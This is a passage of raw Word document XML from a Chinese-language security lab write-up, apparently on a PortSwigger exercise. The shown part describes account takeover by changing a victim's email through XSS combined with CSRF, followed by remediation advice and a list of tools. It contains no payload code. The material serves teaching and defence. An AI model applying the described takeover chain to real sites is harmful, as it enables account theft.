        </w:rPr>
        <w:t>账户接管风险</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>：如果攻击者修改了受害者绑定的邮箱，那么可以通过“找回密码”功能，直接重置受害者的密码，从而完全接管账户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DD2047" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. 修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C2C8C" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>① </w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>消除 XSS 漏洞（根源防御）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>：严格对用户输入的评论内容进行 HTML 编码（过滤 &lt;script&gt; 等标签），彻底杜绝 XSS 的执行可能性。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:br/>
        <w:t>② </w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>加固 CSRF 防御（双层保险）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>：除了使用 CSRF Token，后端接口必须强制校验 HTTP 请求头中的 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t> 和 Origin 字段，拒绝来自非本域的跨域请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:br/>
        <w:t>③ </w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">设置 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 与 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>：设置 Cookie 的 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>=Strict 属性，禁止第三方站点发起的请求携带用户身份凭证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B5A7CA" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. 工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F2BB4F" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Chrome / Firefox</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>（浏览器开发者工具查看源码与 DOM 结构）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B08B81E" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security Academy</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>（靶场平台）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCF6830" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRDefault="00A923C7"/>
    <w:sectPr w:rsidR="00A923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83F34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFCA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4877F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B3544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0E2396"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC3C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008697">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1605383507">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="17709294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3C7"/>
    <w:rsid w:val="003D7B83"/>
    <w:rsid w:val="00A92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D1F4A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FEB34E04-3371-4D0C-83B8-416665458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923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3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3C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3C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3C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3C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3C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3C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3C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3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3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3C7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3C7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3C7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3C7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3C7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3C7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923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3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3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3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3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3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344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建军 陆</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>建军 陆</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-19T04:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-19T04:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>